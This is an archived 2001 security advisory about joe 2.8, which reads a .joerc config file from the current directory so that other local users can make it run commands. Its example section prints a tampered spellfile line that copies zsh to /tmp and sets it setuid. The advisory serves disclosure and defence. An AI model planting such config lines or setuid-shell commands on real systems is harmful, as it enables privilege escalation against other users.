Joe's Own Editor File Handling Error

From: advisories@WKIT.COM
Date: Wed Feb 28 2001 - 15:13:42 CET

Next message: Linux Mandrake Security Team: "MDKSA-2001:026 - joe update"

Previous message: Thomas Biege: "SuSE Security Announcement: eperl (SuSE-SA:2001:08)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

WKIT SECURITY AB
www.wkit.com

TITLE: Joe's Own Editor File Handling Error
ADVISORY ID: WSIR-01/02-02
REFERENCE: http://www.wkit.com/advisories
CVE: GENERIC-MAP-NOMATCH
CREDIT: Christer Öberg, Wkit Security AB
CONTACT: advisories@wkit.com
CLASS: File Handling Error
OBJECT: joe(1) (exec)
VENDOR: Josef H. Allen
STATUS:
REMOTE: No
LOCAL: Yes
VULNERABLE: Joseph Allen joe 2.8

DATE
  CREATED: 26/02/2001
  LAST UPDATED:
  VENDOR CONTACT:
  RELEASE: 28/02/2001

VULNERABILITY DESCRIPTION
  joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
  /usr/local/lib/joerc in that order. Users could be tricked into execute
  commands if they open/edit a file with joe in a directory where other
  users can write.

CONDITIONS
User using joe in a world/group writable directory.

EXAMPLE
  A user copy the default joerc file to a world writable directory and
change
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
  to
  :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty
>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod
  4755 /tmp/suid",rtn,retype
  Another user opens a file in that directory with joe and run ispell with
  ^[l the result is a suid shell in /tmp

SOLUTION/VENDOR INFORMATION/WORKAROUND

DISCLAIMER
  The contents of this advisory may be distributed freely, provided that
  no fee is charged and proper credit is given. Wkit Security AB takes
  no credit for this discovery if someone else has published this
  information in the public domain before this advisory was released.
  The information herein is intended for educational purposes, not for
  malicious use. Wkit Security AB takes no responsibility whatsoever for
the
  use of this information.

ABOUT
Wkit Security AB is an independent data security company working with
security-related services and products.

  Wkit Security AB
  Upperudsv. 4
  S-464 72 Håverud
  SWEDEN
  http://www.wkit.com
  e-mail: advisories@wkit.com

Next message: Linux Mandrake Security Team: "MDKSA-2001:026 - joe update"
Previous message: Thomas Biege: "SuSE Security Announcement: eperl (SuSE-SA:2001:08)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Apr 26 2001 - 22:54:04 CEST